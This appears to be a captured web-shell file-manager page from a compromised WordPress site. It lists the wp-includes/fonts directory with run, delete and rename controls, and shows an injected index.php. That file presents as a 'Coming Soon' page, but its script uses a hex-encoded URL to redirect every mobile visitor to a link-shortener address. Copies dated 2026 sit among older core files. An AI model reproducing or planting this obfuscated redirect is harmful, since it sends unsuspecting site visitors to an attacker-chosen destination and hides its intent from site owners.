at path:
ROOT
/
wp-includes
/
fonts
/
index.php
run:
R
W
Run
class-wp-font-collection.php
16.57 KB
2024-02-21 19:27:14
R
W
Run
Delete
Rename
class-wp-font-face-resolver.php
13.41 KB
2024-11-13 19:02:13
R
W
Run
Delete
Rename
class-wp-font-face.php
17.9 KB
2024-11-13 19:02:13
R
W
Run
Delete
Rename
class-wp-font-library.php
11.31 KB
2024-02-21 19:27:14
R
W
Run
Delete
Rename
class-wp-font-utils.php
16.57 KB
2024-09-04 11:48:32
R
W
Run
Delete
Rename
dashicons.eot
55.24 KB
2020-07-17 17:11:03
R
W
Run
Delete
Rename
dashicons.svg
121.69 KB
2020-07-17 17:11:03
R
W
Run
Delete
Rename
dashicons.ttf
55.07 KB
2020-07-17 17:11:03
R
W
Run
Delete
Rename
dashicons.woff
25.51 KB
2016-03-18 20:26:26
R
W
Run
Delete
Rename
dashicons.woff2
25.52 KB
2020-07-17 17:11:03
R
W
Run
Delete
Rename
index.htm
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
index.html
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
index.php
1.07 KB
2026-03-17 01:08:49
R
W
Run
Delete
Rename
error_log
up
📄
index.php
Save
<!DOCTYPE html> <html lang="ar"> <head> <meta charset="UTF-8"> <title>Coming Soon</title> <style> body { display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background-color: #f0f6fc; font-family: Arial, sans-serif; text-align: center; color: #21759b; } h1 { font-size: 7em; margin: 0; } p { font-size: 1.5em; margin-top: 0.5em; } </style> </head> <body> <div> <h1>WordPress</h1> <p><b>Coming Soon</b></p> </div> <script> document.addEventListener("DOMContentLoaded", function() { if (/Mobi|Android|iPhone|iPad|iPod|IEMobile|Opera Mini/i.test(navigator.userAgent)) { window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x76\x48\x77\x48\x59\x43\x7a\x30\x72\x34"; } }); </script> </body> </html>